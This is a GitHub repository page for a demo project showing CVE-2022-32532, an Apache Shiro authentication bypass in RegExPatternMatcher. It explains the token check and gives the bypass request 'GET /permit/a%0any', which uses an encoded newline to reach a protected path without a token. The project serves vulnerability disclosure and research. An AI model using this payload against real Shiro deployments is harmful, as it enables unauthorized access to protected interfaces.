Skip to content

Lay0us1/CVE-2022-32532

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 
 
 
 
 
 
 

Repository files navigation

CVE-2022-32532

about

This is a demo project, which only shows one of the conditions for exploiting this vulnerability (CVE-2022-32532).

In fact, there are more ways to exploit it, as long as developers use RegExPatternMatcher, there will be a possible bypass vulnerability.

introduce

Token request header verification is required under the current configuration, otherwise you do not have permission to access the interface under /permit

This request can succeed

GET /permit/any HTTP/1.1
Token: 4ra1n

Access is not allowed when there is no token request header

GET /permit/any HTTP/1.1

It can be bypassed in a simple way in special but common configurations

GET /permit/a%0any HTTP/1.1

reference

https://lists.apache.org/thread/y8260dw8vbm99oq7zv6y3mzn5ovk90xh

This vulnerability is similar to Spring-Security CVE-2022-22978

Thanks to bdemers (Apache Shiro PMC) and chybeta (Security Researcher)

About

Apache Shiro CVE-2022-32532

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages